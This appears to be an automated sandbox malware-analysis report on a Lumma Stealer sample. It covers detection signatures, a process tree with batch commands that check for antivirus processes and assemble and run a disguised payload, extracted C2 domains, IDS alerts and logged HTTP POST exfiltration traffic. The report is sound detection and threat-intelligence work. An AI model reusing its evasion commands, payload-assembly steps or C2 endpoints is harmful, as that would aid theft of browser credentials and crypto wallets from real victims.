Edit tour

Windows Analysis Report
Okfjk1hs4kdhs2.exe

Overview

General Information

Sample name:	Okfjk1hs4kdhs2.exe
Analysis ID:	1543812
MD5:	68a5a9e169248c593aa8080e6172bf86
SHA1:	d4f93a9c039fcff9651ff11906ecf3a70199beec
SHA256:	19c683016b8171a4bdb6c987b2045307289656d2c555d08f14ef6c342dca0ea0
Tags:	exeLummauser-ramirezrick2
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Copy From or To System Directory

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Okfjk1hs4kdhs2.exe (PID: 4276 cmdline: "C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe" MD5: 68A5A9E169248C593AA8080E6172BF86)

cmd.exe (PID: 7108 cmdline: "C:\Windows\System32\cmd.exe" /c copy Belly Belly.bat & Belly.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5948 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 3176 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7104 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5804 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 4952 cmdline: cmd /c md 756341 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 4308 cmdline: findstr /V "MENTIONSTATICARGUEKEEPS" Abuse MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 1532 cmdline: cmd /c copy /b ..\Significant + ..\Bow + ..\Olympics + ..\Intimate + ..\Tobago + ..\Suzuki + ..\Relevance V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Place.pif (PID: 7132 cmdline: Place.pif V MD5: 18CE19B57F43CE0A5AF149C96AECC685)

choice.exe (PID: 6848 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["goalyfeastz.site", "opposezmny.site", "seallysl.site", "authorisev.site", "contemteny.site", "dilemmadu.site", "faulteyotk.site", "servicedny.site"], "Build id": "IRiaFi--2810mr"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: Place.pif PID: 7132	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Place.pif PID: 7132	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Place.pif PID: 7132	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: Place.pif V, CommandLine: Place.pif V, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\756341\Place.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\756341\Place.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\756341\Place.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Belly Belly.bat & Belly.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7108, ParentProcessName: cmd.exe, ProcessCommandLine: Place.pif V, ProcessId: 7132, ProcessName: Place.pif

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Belly Belly.bat & Belly.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Belly Belly.bat & Belly.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe", ParentImage: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe, ParentProcessId: 4276, ParentProcessName: Okfjk1hs4kdhs2.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Belly Belly.bat & Belly.bat, ProcessId: 7108, ProcessName: cmd.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Belly Belly.bat & Belly.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7108, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 5804, ProcessName: findstr.exe

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T14:07:55.011281+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49901	104.21.9.13	443	TCP
2024-10-28T14:07:56.227768+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49911	104.21.9.13	443	TCP
2024-10-28T14:08:05.859421+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49969	104.21.9.13	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T14:07:55.011281+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49901	104.21.9.13	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T14:07:56.227768+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49911	104.21.9.13	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T14:08:01.810652+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49946	104.21.9.13	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000B.00000002.2709113133.00000000012DE000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["goalyfeastz.site", "opposezmny.site", "seallysl.site", "authorisev.site", "contemteny.site", "dilemmadu.site", "faulteyotk.site", "servicedny.site"], "Build id": "IRiaFi--2810mr"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.8% probability

Sample uses string decryption to hide its real strings

Source: 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: servicedny.site
Source: 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: authorisev.site
Source: 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: faulteyotk.site
Source: 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: dilemmadu.site
Source: 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: contemteny.site
Source: 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: goalyfeastz.site
Source: 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: opposezmny.site
Source: 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: seallysl.site
Source: 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: faulteyotk.site
Source: 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000B.00000002.2709912309.00000000047E1000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -

Source: Okfjk1hs4kdhs2.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.9.13:443 -> 192.168.2.5:49901 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.9.13:443 -> 192.168.2.5:49911 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.9.13:443 -> 192.168.2.5:49917 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.9.13:443 -> 192.168.2.5:49928 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.9.13:443 -> 192.168.2.5:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.9.13:443 -> 192.168.2.5:49946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.9.13:443 -> 192.168.2.5:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.9.13:443 -> 192.168.2.5:49969 version: TLS 1.2

Source: Okfjk1hs4kdhs2.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005E4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_005E4005
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005EC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	11_2_005EC2FF
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005E494A GetFileAttributesW,FindFirstFileW,FindClose,	11_2_005E494A
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005ECD14 FindFirstFileW,FindClose,	11_2_005ECD14
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005ECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	11_2_005ECD9F
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005EF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_005EF5D8
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005EF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_005EF735
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005EFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	11_2_005EFA36
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005E3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_005E3CE2

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\756341\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\756341	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49901 -> 104.21.9.13:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49901 -> 104.21.9.13:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49969 -> 104.21.9.13:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49946 -> 104.21.9.13:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49911 -> 104.21.9.13:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49911 -> 104.21.9.13:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: goalyfeastz.site
Source: Malware configuration extractor	URLs: opposezmny.site
Source: Malware configuration extractor	URLs: seallysl.site
Source: Malware configuration extractor	URLs: authorisev.site
Source: Malware configuration extractor	URLs: contemteny.site
Source: Malware configuration extractor	URLs: dilemmadu.site
Source: Malware configuration extractor	URLs: faulteyotk.site
Source: Malware configuration extractor	URLs: servicedny.site

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: faulteyotk.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: faulteyotk.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12836Host: faulteyotk.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15078Host: faulteyotk.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20568Host: faulteyotk.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1239Host: faulteyotk.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 579019Host: faulteyotk.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 83Host: faulteyotk.site

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005F29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

11_2_005F29BA

Source: global traffic	DNS traffic detected: DNS query: XoihaBktBfpQRsABjqvzDOKOlj.XoihaBktBfpQRsABjqvzDOKOlj
Source: global traffic	DNS traffic detected: DNS query: faulteyotk.site

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: faulteyotk.site

Source: Okfjk1hs4kdhs2.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Place.pif, 0000000B.00000003.2639808386.000000000440F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Place.pif, 0000000B.00000003.2639808386.000000000440F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Okfjk1hs4kdhs2.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: Okfjk1hs4kdhs2.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Okfjk1hs4kdhs2.exe, 00000000.00000003.2078289262.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2585910317.00000000046BA000.00000004.00000800.00020000.00000000.sdmp, Place.pif.2.dr, Hit.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Okfjk1hs4kdhs2.exe, 00000000.00000003.2078289262.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2585910317.00000000046BA000.00000004.00000800.00020000.00000000.sdmp, Place.pif.2.dr, Hit.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Okfjk1hs4kdhs2.exe, 00000000.00000003.2078289262.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2585910317.00000000046BA000.00000004.00000800.00020000.00000000.sdmp, Place.pif.2.dr, Hit.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Okfjk1hs4kdhs2.exe, 00000000.00000003.2078289262.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2585910317.00000000046BA000.00000004.00000800.00020000.00000000.sdmp, Place.pif.2.dr, Hit.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Place.pif, 0000000B.00000003.2639808386.000000000440F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Okfjk1hs4kdhs2.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: Okfjk1hs4kdhs2.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Place.pif, 0000000B.00000003.2639808386.000000000440F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Place.pif, 0000000B.00000003.2639808386.000000000440F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Okfjk1hs4kdhs2.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: Okfjk1hs4kdhs2.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Okfjk1hs4kdhs2.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Place.pif, 0000000B.00000003.2639808386.000000000440F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Okfjk1hs4kdhs2.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: Okfjk1hs4kdhs2.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Place.pif, 0000000B.00000003.2639808386.000000000440F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Okfjk1hs4kdhs2.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Place.pif, 0000000B.00000003.2639808386.000000000440F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Okfjk1hs4kdhs2.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: Okfjk1hs4kdhs2.exe	String found in binary or memory: http://ocsp.digicert.com0N
Source: Okfjk1hs4kdhs2.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: Place.pif, 0000000B.00000003.2639808386.000000000440F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Okfjk1hs4kdhs2.exe, 00000000.00000003.2078289262.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2585910317.00000000046BA000.00000004.00000800.00020000.00000000.sdmp, Place.pif.2.dr, Hit.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Okfjk1hs4kdhs2.exe, 00000000.00000003.2078289262.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2585910317.00000000046BA000.00000004.00000800.00020000.00000000.sdmp, Place.pif.2.dr, Hit.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Okfjk1hs4kdhs2.exe, 00000000.00000003.2078289262.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2585910317.00000000046BA000.00000004.00000800.00020000.00000000.sdmp, Place.pif.2.dr, Hit.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Okfjk1hs4kdhs2.exe, 00000000.00000003.2078289262.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2585910317.00000000046BA000.00000004.00000800.00020000.00000000.sdmp, Place.pif.2.dr, Hit.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Okfjk1hs4kdhs2.exe, 00000000.00000003.2078289262.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2585910317.00000000046BA000.00000004.00000800.00020000.00000000.sdmp, Place.pif.2.dr, Hit.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Okfjk1hs4kdhs2.exe, 00000000.00000003.2078289262.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmp, Place.pif, 0000000B.00000003.2585910317.00000000046BA000.00000004.00000800.00020000.00000000.sdmp, Place.pif.2.dr, Hit.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Okfjk1hs4kdhs2.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Place.pif, 0000000B.00000003.2639808386.000000000440F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Place.pif, 0000000B.00000003.2639808386.000000000440F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
